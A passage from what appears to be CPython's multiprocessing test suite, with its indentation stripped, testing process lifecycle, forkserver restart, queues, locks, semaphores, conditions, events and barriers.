self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
cases = [
((True,), 1),
((False,), 0),
((8,), 8),
((None,), 0),
((), 0),
]
for args, expected in cases:
with self.subTest(args=args):
p = self.Process(target=sys.exit, args=args)
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, expected)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
